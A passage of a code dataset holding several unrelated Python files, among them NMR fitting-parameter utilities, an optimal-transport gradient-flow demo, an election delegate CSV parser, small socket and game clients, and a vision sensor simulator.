name_components.append(FRIENDLY_MARKERS[attribute].format(value))\n\n section_name = \", \".join(name_components).upper()\n\n return section_name\n\n def to_re(self):\n \"\"\"TODO: method docstring.\"\"\"\n re_components = [NAME_MARKERS[\"name\"].format(EXPAND(self.name))]\n\n if self.nuclei is not None:\n group_name = peaks.Peak(self.nuclei)._resonances[\"i\"][\"group\"]\n if not group_name:\n all_res = \"\\D?[0-9]+[abd-gi-mopr-z]*\"\n else:\n all_res = \"\"\n re_components.append(\n NAME_MARKERS[\"nuclei\"].format(\"\".join([all_res, EXPAND(self.nuclei)]))\n )\n else:\n re_components.append(\".*\")\n\n if self.temperature is not None:\n re_components.append(\n NAME_MARKERS[\"temperature\"].format(EXPAND(str(self.temperature)))\n )\n elif re_components[-1] != \".*\":\n re_components.append(\".*\")\n\n if self.h_larmor_frq is not None:\n re_components.append(\n NAME_MARKERS[\"h_larmor_frq\"].format(EXPAND(str(self.h_larmor_frq)))\n )\n elif re_components[-1] != \".*\":\n re_components.append(\".*\")\n\n if self.p_total is not None:\n re_components.append(\n NAME_MARKERS[\"p_total\"].format(EXPAND(str(self.p_total)))\n )\n elif re_components[-1] != \".*\":\n re_components.append(\".*\")\n\n if self.l_total is not None:\n re_components.append(\n NAME_MARKERS[\"l_total\"].format(EXPAND(str(self.l_total)))\n )\n elif re_components[-1] != \".*\":\n re_components.append(\".*\")\n\n re_to_match = re.compile(\"\".join(re_components), re.IGNORECASE)\n\n return re_to_match\n\n def __repr__(self):\n return self.to_section_name(nuclei=True)\n\n def __lt__(self, other):\n tuple_self = (\n self.name,\n self.temperature,\n self.h_larmor_frq,\n self.p_total,\n self.l_total,\n peaks.Peak(self.nuclei),\n )\n\n tuple_other = (\n other.name,\n other.temperature,\n other.h_larmor_frq,\n other.p_total,\n other.l_total,\n peaks.Peak(other.nuclei),\n )\n\n return tuple_self < tuple_other\n\n def intersection(self, other):\n \"\"\"TODO: method docstring.\"\"\"\n name = temperature = h_larmor_frq = p_total = l_total = None\n\n if self.name == other.name:\n name = self.name\n\n nuclei = (\n peaks.Peak(self.nuclei).intersection(peaks.Peak(other.nuclei)).assignment\n )\n\n if not nuclei:\n nuclei = None\n\n if self.temperature == other.temperature:\n temperature = self.temperature\n\n if self.h_larmor_frq == other.h_larmor_frq:\n 
h_larmor_frq = self.h_larmor_frq\n\n if self.p_total == other.p_total:\n p_total = self.p_total\n\n if self.l_total == other.l_total:\n l_total = self.l_total\n\n return ParamName(\n name=name,\n nuclei=nuclei,\n temperature=temperature,\n h_larmor_frq=h_larmor_frq,\n p_total=p_total,\n l_total=l_total,\n )\n\n\ndef create_params(data):\n \"\"\"Create the array of fitting parameters.\"\"\"\n params = lmfit.Parameters()\n\n for profile in data:\n for name, param in profile.params.items():\n if name in params:\n vary = params[name].vary\n else:\n vary = False\n param._delay_asteval = True\n params[name] = param\n params[name].vary = vary | param.vary\n\n for p in params.values():\n p._delay_asteval = False\n\n return params\n\n\ndef set_params_from_config_file(params, config_filename):\n \"\"\"Read the parameter file and set initial values and optional bounds and brute\n step size.\"\"\"\n\n print(f\"File Name: {config_filename}\", end=\"\\n\\n\")\n\n config = util.read_cfg_file(config_filename)\n\n print(\"{:<45s} {:<30s}\".format(\"Section\", \"Matches\"))\n print(\"{:<45s} {:<30s}\".format(\"-------\", \"-------\"))\n\n for section in config.sections():\n if section.lower() in (\"global\", \"default\"):\n print(\"{:<45s}\".format(f\"[{section}]\"))\n\n for key, value in config.items(section):\n name = ParamName.from_section(key)\n if value.count(\",\") == 2:\n default = re_to_dict(RE_VALUE_MIN_MAX_BRUTE, value)\n else:\n default = re_to_dict(RE_VALUE_MIN_MAX, value)\n default = {key: np.float64(val) for key, val in default.items()}\n matches = set_params(params, name, **default)\n\n print(\" {:<43s} {:<30d}\".format(f\"({key})\", len(matches)))\n\n else:\n name = ParamName.from_section(section)\n\n pairs = []\n\n for key, value in config.items(section):\n if \"file\" in key:\n for filename in value.split():\n filename_ = pathlib.Path(filename)\n filename_ = util.normalize_path(\n config_filename.parent, filename_\n )\n pairs.extend(get_pairs_from_file(filename_, name))\n\n elif peaks.RE_PEAK_NAME.match(key):\n name.update_nuclei(key)\n pairs.append((copy.deepcopy(name), value))\n\n total_matches = set()\n\n for name, value in pairs:\n if value.count(\",\") == 2:\n default = re_to_dict(RE_VALUE_MIN_MAX_BRUTE, value)\n else:\n default = re_to_dict(RE_VALUE_MIN_MAX, value)\n default = {key: np.float64(val) for key, val in default.items()}\n matches = set_params(params, name, **default)\n total_matches.update(matches)\n\n print(\"{:<45s} {:<30d}\".format(f\"[{section}]\", len(total_matches)))\n\n\ndef get_pairs_from_file(filename, name):\n \"\"\"Read residue specific values for fitting parameters from a file.\n\n The file should be formatted like a Sparky peak list.\n Examples:\n * To set G23N to 105.0 and G23H to 8.0:\n G23N-H 105.0 8.0\n * To set a parameter depending on multiple nuclei (e.g., G23N and G23H):\n G23N-H -93.0\n\n \"\"\"\n pairs = []\n\n with open(filename) as f:\n for line in f:\n if \"Assignment\" in line:\n continue\n\n line = remove_comments(line, \"#;\")\n line = re.sub(\"\\s*\\[\\s*\", \"[\", line)\n line = re.sub(\"\\s*\\]\\s*\", \"]\", line)\n elements = line.split()\n\n if len(elements) > 1:\n peak = peaks.Peak(elements[0])\n n_resonances = len(peak)\n n_cols = len(elements[1:])\n\n if n_cols == n_resonances:\n for nuc_name, value in zip(peak.names.values(), elements[1:]):\n name.update_nuclei(nuc_name)\n pairs.append((copy.deepcopy(name), value))\n\n else:\n name.update_nuclei(peak.assignment)\n pairs.append((copy.deepcopy(name), elements[1]))\n\n return 
pairs\n\n\ndef set_param_status(params, items):\n \"\"\"Set whether or not to vary a fitting parameter or to use a mathemetical\n expression.\"\"\"\n\n vary = {\"fix\": False, \"fit\": True}\n\n for key, status in items:\n name = ParamName.from_section(key)\n\n if status in vary:\n set_params(params, name, vary=vary[status], expr=\"\")\n else:\n set_param_expr(params, name, expr=status)\n\n\ndef set_param_expr(params, name, expr=None):\n \"\"\"Set an optional parameter expression, used to constrain its value during\n the fit.\"\"\"\n\n if expr is None:\n expr = \"\"\n\n if not isinstance(name, ParamName):\n name = ParamName.from_section(name)\n\n names_full = [name_full for name_full in params if name.to_re().match(name_full)]\n names_expr = astutils.get_ast_names(ast.parse(expr))\n names_full_expr = {\n name: [\n name_full_expr\n for name_full_expr in params\n if ParamName.from_section(name).to_re().match(name_full_expr)\n ]\n for name in names_expr\n }\n\n matches = set()\n\n for name_full in names_full:\n\n expr_ = expr\n\n for name_expr in names_expr:\n name_full_expr = get_close_matches(\n name_full, names_full_expr[name_expr], n=1\n )[0]\n expr_ = expr_.replace(name_expr, name_full_expr)\n\n params[name_full].expr = expr_\n\n matches.add(name_full)\n\n return matches\n\n\ndef set_params(\n params,\n name_short,\n value=None,\n vary=None,\n min=None,\n max=None,\n expr=None,\n brute_step=None,\n):\n \"\"\"Set the initial value and (optional) bounds and brute step size for\n parameters.\"\"\"\n matches = set()\n name_short_re = name_short.to_re()\n\n for name, param in params.items():\n if name_short_re.match(name):\n if expr is None and param.expr and vary is None:\n param.value = value\n else:\n param.set(value, vary, min, max, expr, brute_step)\n matches.add(name)\n\n return matches\n\n\ndef write_par(params, path):\n \"\"\"Write the fitting parameters and their uncertainties to a file.\"\"\"\n filename = path / \"parameters.fit\"\n\n print(f\" * {filename}\")\n\n par_dict = {}\n\n for name, param in params.items():\n\n par_name = ParamName.from_fname(name)\n\n if par_name.nuclei is None: # global parameter\n name_print = par_name\n section = \"GLOBAL\"\n\n else: # residue-specific parameter\n name_print = peaks.Peak(par_name.nuclei)\n section = par_name.to_section_name()\n\n if not param.vary and param.expr is None:\n val_print = f\"{param.value:.5e} ; fixed\"\n elif param.stderr is None:\n val_print = f\"{param.value:.5e} ; error not calculated\"\n elif param.expr:\n val_print = f\"{param.value:.5e} +/- {param.stderr:.5e} ; constrained\"\n else:\n val_print = f\"{param.value:.5e} +/- {param.stderr:.5e}\"\n\n par_dict.setdefault(section, []).append((name_print, val_print))\n\n cfg = configparser.ConfigParser()\n cfg.optionxform = str\n\n section_global = par_dict.pop(\"GLOBAL\", None)\n\n if section_global is not None:\n cfg.add_section(\"GLOBAL\")\n for name, val in sorted(section_global):\n cfg.set(\"GLOBAL\", str(name), val)\n\n for section, name_vals in sorted(par_dict.items()):\n cfg.add_section(section)\n for peak, val in sorted(name_vals):\n cfg.set(section, peak.assignment.upper(), val)\n\n with open(filename, \"w\") as f:\n cfg.write(f)\n\n\ndef write_constraints(params, path):\n \"\"\"Write the (optional) parameter expression constraints to a file.\"\"\"\n filename = path / \"constraints.fit\"\n\n print(f\" * {filename}\")\n\n param_dict = dict()\n\n for name, param in params.items():\n\n par_name = ParamName.from_fname(name)\n\n if param.expr:\n name_formatted = 
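# Worked example of the "value [min, max]" syntax parsed above: re_to_dict
# keeps only the named groups that matched, and the resulting strings are then
# cast with np.float64 before being handed to set_params().
demo_parsed = re_to_dict(RE_VALUE_MIN_MAX, "2.5 [0.0, inf]")
# demo_parsed == {"value": "2.5", "min": "0.0", "max": "inf"}
demo_default = {key: np.float64(val) for key, val in demo_parsed.items()}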
\"[{}]\".format(par_name.to_section_name(nuclei=True))\n expr_formatted = param.expr\n for name_dep in astutils.get_ast_names(ast.parse(param.expr)):\n par_name_dep = ParamName.from_fname(name_dep)\n if str(par_name_dep):\n expr_formatted = expr_formatted.replace(\n name_dep,\n \"[{}]\".format(par_name_dep.to_section_name(nuclei=True)),\n )\n\n param_dict[par_name] = f\"{name_formatted} = {expr_formatted}\\n\"\n\n with open(filename, \"w\") as f:\n for name, constraint in sorted(param_dict.items()):\n f.write(constraint)\n\n\ndef remove_comments(line, sep):\n \"\"\"Remove (optional) comments.\"\"\"\n for a_sep in sep:\n line = line.split(a_sep)[0]\n\n return line.strip()\n\n\ndef re_to_dict(re_to_match, text):\n \"\"\"TODO: function docstring.\"\"\"\n return {\n match_key: match_value\n for match in re_to_match.finditer(text)\n for match_key, match_value in match.groupdict().items()\n if match_value is not None\n }\n","sub_path":"chemex/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":17725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159950160","text":"\"\"\"\nGradient flows in 2D\n====================\n\nLet's showcase the properties of **kernel MMDs**, **Hausdorff**\nand **Sinkhorn** divergences on a simple toy problem:\nthe registration of one blob onto another.\n\"\"\"\nimport ot\n\n##############################################\n# Setup\n# ---------------------\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nfrom utils import cost_matrix\nimport torch\nimport numpy as np\nimport torch\nfrom random import choices\nfrom imageio import imread\nfrom matplotlib import pyplot as plt\nimport cvxpy as cp\nfrom geomloss import SamplesLoss\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ndef solve_uot_original(C, a, b, tau1, tau2, solver='ECOS', verbose=False):\n X = cp.Variable((a.shape[0], b.shape[0]))\n\n sum_X = cp.sum(X)\n sum_rowX = cp.sum(X, axis=1)\n sum_colX = cp.sum(X, axis=0)\n\n cost = cp.sum(cp.multiply(X, C))\n kl_row = - cp.sum(cp.entr(sum_rowX)) - cp.sum(cp.multiply(sum_rowX, cp.log(a.reshape(-1, )))) - sum_X + cp.sum(a.reshape(-1, ))\n kl_col = - cp.sum(cp.entr(sum_colX)) - cp.sum(cp.multiply(sum_colX, cp.log(b.reshape(-1, )))) - sum_X + cp.sum(b.reshape(-1, ))\n\n total_cost = cost + tau1 * kl_row + tau2 * kl_col\n\n objective = cp.Minimize(total_cost)\n constraints = [0 <= X]\n\n prob = cp.Problem(objective, constraints)\n prob.solve(solver=solver, verbose=verbose)\n\n return prob.value, X.value\ndef compute_true_Wasserstein(X,Y,p=2):\n M = ot.dist(X.detach().numpy(), Y.detach().numpy())\n a = np.ones((X.shape[0],)) / X.shape[0]\n b = np.ones((Y.shape[0],)) / Y.shape[0]\n return ot.emd2(a, b, M)\ndef compute_Wasserstein(M,device='cuda',e=0):\n if(e==0):\n pi = ot.emd([],[],M.cpu().detach().numpy()).astype('float32')\n else:\n pi = ot.sinkhorn([], [], M.cpu().detach().numpy(),reg=e).astype('float32')\n pi = torch.from_numpy(pi).to(device)\n return torch.sum(pi*M)\ndef mOT(firsttensor, secondtensor, p=2, device='cpu',numbatch=4,batch_size=16,e=0):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n w = compute_Wasserstein(M, device,e)\n ll.append(w)\n 
return torch.stack(ll).mean()\n\ndef BoMbOT(firsttensor, secondtensor, p=2, device='cpu',numbatch=4,batch_size=16,e=0):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n w = compute_Wasserstein(M, device,e=e)\n ll.append(w)\n M = torch.stack(ll).view(numbatch, numbatch)\n return compute_Wasserstein(M, device)\ndef eBoMbOT(firsttensor, secondtensor, p=2, breg=0.01,device='cpu',numbatch=4,batch_size=16,e=0):\n inds1 = []\n inds2 = []\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n w = compute_Wasserstein(M, device,e)\n ll.append(w)\n M = torch.stack(ll).view(numbatch, numbatch)\n return compute_Wasserstein(M, device,e=breg)\n\ndef mUOT(firsttensor, secondtensor, p=2, device='cpu',numbatch=4,batch_size=4,reg=1,tau=0.01):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n _,pi = solve_uot_original(M.cpu().detach().numpy().astype('float32'),np.ones(batch_size)/batch_size, np.ones(batch_size)/batch_size,tau,tau )\n pi = torch.from_numpy(pi).to(device)\n w = torch.sum(pi*M)\n ll.append(w)\n return torch.stack(ll).mean()\n\ndef BoMbUOT(firsttensor, secondtensor, p=2, device='cuda',numbatch=4,batch_size=4,reg=1,tau=0.01):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n pi = ot.unbalanced.sinkhorn_knopp_unbalanced(np.ones(batch_size) / batch_size, np.ones(batch_size) / batch_size,\n M.cpu().detach().numpy().astype('float32'), reg=reg, reg_m=tau)\n pi = torch.from_numpy(pi).to(device)\n w = torch.sum(pi * M)\n ll.append(w)\n M = torch.stack(ll).view(numbatch, numbatch)\n return compute_Wasserstein(M, device)\n\ndef mPOT(firsttensor, secondtensor, p=2, device='cuda',numbatch=4,batch_size=4,mass=0.8,e=1):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n if(e==0):\n pi= ot.partial.partial_wasserstein(np.ones(batch_size) / batch_size, np.ones(batch_size) / batch_size, M.cpu().detach().numpy().astype('float32'), m=mass)\n else:\n pi = ot.partial.entropic_partial_wasserstein(np.ones(batch_size) / batch_size, np.ones(batch_size) / batch_size,\n M.cpu().detach().numpy().astype('float32'), m=mass,reg=e)\n pi = torch.from_numpy(pi).to(device)\n w = 
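# Hedged numeric sketch of the m-OT / BoMb-OT distinction implemented above:
# m-OT simply averages the k x k mini-batch OT costs, whereas BoMb-OT solves
# one extra OT problem that treats those costs as a meta cost matrix.
# (Toy numbers; compute_Wasserstein is the helper defined in this file.)
demo_batch_costs = torch.tensor([[0.2, 0.9], [0.8, 0.3]])
demo_m_ot = demo_batch_costs.mean()                                 # 0.55
demo_bomb_ot = compute_Wasserstein(demo_batch_costs, device='cpu')  # 0.25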
torch.sum(pi*M)\n ll.append(w)\n return torch.stack(ll).mean()\ndef BoMbPOT(firsttensor, secondtensor, p=2, device='cuda',numbatch=4,batch_size=4,mass=0.8,e=1):\n inds1=[]\n inds2=[]\n for _ in range(numbatch):\n inds1.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n inds2.append(np.random.choice(firsttensor.shape[0], batch_size, replace=False))\n ll = []\n for i in range(numbatch):\n for j in range(numbatch):\n M = cost_matrix(firsttensor[inds1[i]], secondtensor[inds2[j]], p)\n if (e == 0):\n pi = ot.partial.partial_wasserstein(np.ones(batch_size) / batch_size, np.ones(batch_size) / batch_size,\n M.cpu().detach().numpy().astype('float32'), m=mass)\n else:\n pi = ot.partial.entropic_partial_wasserstein(np.ones(batch_size) / batch_size,\n np.ones(batch_size) / batch_size,\n M.cpu().detach().numpy().astype('float32'), m=mass, reg=e)\n pi = torch.from_numpy(pi).to(device)\n w = torch.sum(pi * M)\n ll.append(w)\n M = torch.stack(ll).view(numbatch, numbatch)\n return compute_Wasserstein(M, device)\n\nuse_cuda = torch.cuda.is_available()\ndtype = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\n\n###############################################\n# Display routine\n# ~~~~~~~~~~~~~~~~~\n\n\n\n\n\ndef load_image(fname):\n img = imread(fname, as_gray=True) # Grayscale\n img = (img[::-1, :]) / 255.\n return 1 - img\n\n\ndef draw_samples(fname, n, dtype=torch.FloatTensor):\n A = load_image(fname)\n xg, yg = np.meshgrid(np.linspace(0, 1, A.shape[0]), np.linspace(0, 1, A.shape[1]))\n\n grid = list(zip(xg.ravel(), yg.ravel()))\n dens = A.ravel() / A.sum()\n dots = np.array(choices(grid, dens, k=n))\n dots += (.5 / A.shape[0]) * np.random.standard_normal(dots.shape)\n\n return torch.from_numpy(dots).type(dtype)\n\n\ndef display_samples(ax, x, color):\n x_ = x.detach().cpu().numpy()\n ax.scatter(x_[:, 0], x_[:, 1], 25 * 500 / len(x_), color, edgecolors='none')\n\n\n\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\nN, M = (1000, 1000) if not use_cuda else (1000, 1000)\n\nX_i = draw_samples(\"data/density_a.png\", N, dtype)\nY_j = draw_samples(\"data/density_b.png\", M, dtype)\n\n\ndef gradient_flow(loss, lr=.001,title='m-OT',flag=False) :\n \"\"\"Flows along the gradient of the cost function, using a simple Euler scheme.\n\n Parameters:\n loss ((x_i,y_j) -> torch float number):\n Real-valued loss function.\n lr (float, default = .05):\n Learning rate, i.e. time step.\n \"\"\"\n\n # Parameters for the gradient descent\n Nsteps = int(5/lr)+1\n display_its = [int(t/lr) for t in [0, 1, 2, 3, 4, 5.]]\n\n # Use colors to identify the particles\n colors = (10*X_i[:,0]).cos() * (10*X_i[:,1]).cos()\n colors = colors.detach().cpu().numpy()\n\n # Make sure that we won't modify the reference samples\n x_i, y_j = X_i.clone(), Y_j.clone()\n\n # We're going to perform gradient descent on Loss(α, β)\n # wrt. 
the positions x_i of the diracs masses that make up α:\n x_i.requires_grad = True\n\n t_0 = time.time()\n plt.figure(figsize=(12,8)) ; k = 1\n for i in range(Nsteps): # Euler scheme ===============\n # Compute cost and gradient\n L_αβ = loss(x_i, y_j)\n [g] = torch.autograd.grad(L_αβ, [x_i])\n\n if i in display_its : # display\n ax = plt.subplot(1,6,k) ; k = k+1\n if(i==0):\n ax.set_ylabel(title,fontsize=11)\n plt.set_cmap(\"hsv\")\n plt.scatter( [10], [10] ) # shameless hack to prevent a slight change of axis...\n\n display_samples(ax, y_j, [(.55,.55,.95)])\n display_samples(ax, x_i, colors)\n\n ax.set_title(\"$W_2$: \"+str(np.round(compute_true_Wasserstein(x_i.cpu(),y_j.cpu())*100,4)) +r\"$\\times 10^{-2}$\",fontsize=11)\n if(flag):\n ax.set_xlabel(\"steps \"+str(i),fontsize=11)\n plt.axis([0,1,0,1])\n plt.gca().set_aspect('equal', adjustable='box')\n plt.xticks([], []); plt.yticks([], [])\n plt.tight_layout()\n\n # in-place modification of the tensor's values\n x_i.data -= lr * len(x_i) * g\n # plt.title(\"t = {:1.2f}, elapsed time: {:.2f}s/it\".format(lr*i, (time.time() - t_0)/Nsteps ))\n plt.subplots_adjust(left=0.03, bottom=0, right=0.99, top=0.91, wspace=0, hspace=0.2)\n plt.show()\n\n\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(mOT,title='m-OT')\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(BoMbOT,title='BoMb-OT')\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(eBoMbOT,title='eBoMb-OT',flag=True)\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(mUOT,title=r'm-UOT $\\epsilon=1, \\tau=10^{-2}$')\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(BoMbUOT,title=r'BoMb-UOT $\\epsilon=1, \\tau=10^{-2}$')\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(mPOT,title='m-POT s=0.8',flag=True)\nnp.random.seed(1)\ntorch.manual_seed(1)\nrandom.seed(1)\ngradient_flow(BoMbPOT,title='BoMb-POT s=0.8',flag=True)\n\n","sub_path":"GradientFlow/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"592738128","text":"#!/usr/bin/env python3\nimport requests\nimport os\nimport csvkit as csv\nfrom collections import OrderedDict\n\nCANDIDATE_KEYS = OrderedDict([\n (\"O'Malley\", \"omalley\"),\n (\"Clinton\", \"clinton\"),\n (\"Sanders\", \"sanders\"),\n (\"Huckabee\", \"huckabee\"),\n (\"Cruz\", \"cruz\"),\n (\"Kasich\", \"kasich\"),\n (\"Carson\", \"carson\"),\n (\"Trump\", \"trump\"),\n (\"Rubio\", \"rubio\"),\n (\"Christie\", \"christie\"),\n (\"Bush\", \"bush\"),\n (\"Fiorina\", \"fiorina\"),\n (\"Paul\", \"paul\"),\n (\"Uncommitted\", \"uncommitted\"),\n])\n\nURL = 'https://interactives.ap.org/interactives/2016/delegate-tracker/live-data/data/delegates-delsuper.json'\nr = requests.get(URL)\nsupers = r.json()['delSuper']['del']\n\nfor party in supers:\n states = party['State']\n for state in states:\n candidates = state['Cand']\n for cand in candidates:\n cand['pTot'] = int(cand['dTot']) - int(cand['sdTot'])\n\ndem, rep = [p['State'] for p in supers]\n\nrep_dels = [dict([('state', s['sId']), ('party', 'GOP')] + [('%s_del' % CANDIDATE_KEYS.get(c['cName']), c['pTot']) for c in s['Cand'] if c['cName'] in CANDIDATE_KEYS.keys()]) for s in rep]\ndem_dels = [dict([('state', s['sId']), ('party', 'DEM')] + [('%s_del' % CANDIDATE_KEYS.get(c['cName']), c['pTot']) for c in s['Cand'] if c['cName'] in CANDIDATE_KEYS.keys()]) for s in dem]\n\ndem_spdel = 
[dict([('state', 'SPD'), ('party', 'DEM')] + [('%s_del' % CANDIDATE_KEYS.get(c['cName']), c['sdTot']) for c in s['Cand']]) for s in [d for d in dem if d['sId'] == 'US']]\nrep_spdel = [dict([('state', 'SPD'), ('party', 'GOP')] + [('%s_del' % CANDIDATE_KEYS.get(c['cName']), c['sdTot']) for c in s['Cand']]) for s in [d for d in rep if d['sId'] == 'US']]\n\nscript_dir_path = os.path.dirname(os.path.realpath(__file__))\noutpath = os.path.join(script_dir_path, 'delegates_ap.csv')\n\ncand_values = list(CANDIDATE_KEYS.values())\n\n# this bit is just to ensure that the fields come out in a repeatable,\n# regular order\ndef field_sorter(name):\n if name == 'party':\n return -1\n elif name == 'state':\n return -2\n else:\n return cand_values.index(name.split('_')[0])\nfieldnames = sorted(\n set(dem_dels[0].keys()).union(set(rep_dels[0].keys())),\n key=field_sorter\n)\n\ndem_spdel[0] = {k:v for k,v in dem_spdel[0].items() if k in fieldnames}\nrep_spdel[0] = {k:v for k,v in rep_spdel[0].items() if k in fieldnames}\n\ndels = dem_dels + rep_dels + dem_spdel + rep_spdel\n\nwith open(outpath, 'w+') as f:\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(dels)\n","sub_path":"data/parse_ap.py","file_name":"parse_ap.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"34964355","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2016-12-26 12:20:50\n# @Author : Ying Sun\n# @Link : Ying.example.com\n# @Version : 0.1\n\n#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport socket\n\nip_port = ('127.0.0.1',8002)\nsk = socket.socket()\nsk.connect(ip_port)\n\nwhile True:\n inp = raw_input('please input:')\n sk.sendall(inp)\nsk.close()","sub_path":"practice/select_client.py","file_name":"select_client.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"118669806","text":"from client_module import GameClient, timed_input\nimport sys, msvcrt\n\nkeep_playing = 'y'\n\nwhile keep_playing.lower() == 'y':\n host = input(\"Enter the host computer's IP address: \")\n port = input(\"Enter the port # being used on the host computer: \")\n client = GameClient(host, int(port))\n event = ''\n\n while event != 'server closed':\n while client.events.empty():\n continue\n event, details, time_lim, num_chars = client.events.get()\n print(event, end = '')\n if details:\n print(':', details)\n else:\n print()\n if time_lim > 0 and num_chars > 0:\n response = timed_input(\n str.format(\"Give a %d-character response within %d seconds: \"\n % (num_chars, time_lim)), time_lim, num_chars)\n client.send(response)\n\n client.stop()\n while msvcrt.kbhit(): #clears all previous keypresses\n msvcrt.getch()\n keep_playing = input(\"Play again (y/n)? \")\n","sub_path":"ClientServer/cam_client.py","file_name":"cam_client.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"454631029","text":"import numpy\n\nimport localization.sensors.base\nfrom localization.util import Measurement, StateMember\n\n\nclass Vision(localization.sensors.base.SensorBase):\n \"\"\"Simulator of the vision system.\n\n A 3-DOF sensor for linear velocity.\n The coordinates are, in order: forward, left, up.\n\n Simulator of the vision system with the ability to choose the reading\n frequency and covariance. 
Covariances along the first coordinate should\n preferably be set higher than the other two, since that coordinate is the\n hardest to estimate properly.\n\n Parameters\n ----------\n start_time: float\n Start time of the sensor usage, in seconds. Preferably set to 0.\n frequency: float\n Frequency of sensor responses, in Hz.\n covariance: numpy.ndarray\n A 3x3 array describing the vision covariance.\n \"\"\"\n def __init__(self, start_time, frequency, covariance):\n super(Vision, self).__init__(\n start_time, 1. / frequency, numpy.asarray(covariance),\n [StateMember.v_x, StateMember.v_y, StateMember.v_z])\n\n def generateMeasurement(self, real_state):\n \"\"\"Generate a vision measurement based on the given state.\n\n The measurement depends on the vision parameters we've set.\n\n Parameters\n ----------\n real_state: numpy.ndarray\n A 15x1 array representing the actual state.\n\n Returns\n -------\n localization.util.Measurement\n Generate a measurement with added offsets, errors and noises.\n \"\"\"\n meas = numpy.asarray(\n real_state[StateMember.v_x:StateMember.v_z+1]).reshape(3)\n meas = numpy.random.multivariate_normal(meas, self.covariance)\n meas = numpy.asarray(meas).reshape([3, 1])\n return Measurement(0., meas, self.covariance, self.update_vector)\n","sub_path":"localization/sensors/visionapprox.py","file_name":"visionapprox.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"515155845","text":"#!/usr/local/bin/python3.7\n\n# ######################################################\n# Author : < Yanjun Chen >\n# email : < chen2620 >\n# ID : < ee364f21 >\n# Date : < 9/11/2019 >\n# ######################################################\n\nimport os # List of module import statements\nimport sys # Each one on a line\nimport glob\nfrom pprint import pprint as pp\n\ndef getMonthlyVolume():\n with open('stocks.dat', 'r') as f:\n stock = f.readlines()[2:]\n\n dictionary = {}\n for allinfor in stock:\n allinfor = allinfor.split(',')\n date = allinfor[0].split('/')\n dictionary[date[0]+'/'+date[1]] = 0\n\n for allinfor in stock:\n allinfor = allinfor.split(',')\n date = allinfor[0].split('/')\n dictionary[date[0]+'/'+date[1]] += int(float(allinfor[2]))\n return dictionary\n\ndef getCommonDays(year1, year2):\n with open('stocks.dat', 'r') as f:\n stock = f.readlines()[2:]\n\n dictionary = {}\n dictionary[year1] = []\n dictionary[year2] = []\n for allinfor in stock:\n allinfor = allinfor.split(',')\n date = allinfor[0].split('/')\n if (date[0] == year1):\n dictionary[year1].append((date[1],date[2]))\n elif (date[0] == year2):\n dictionary[year2].append((date[1],date[2]))\n\n commondate = set()\n for month,date in dictionary[year1]:\n if ((month,date) in dictionary[year2]):\n 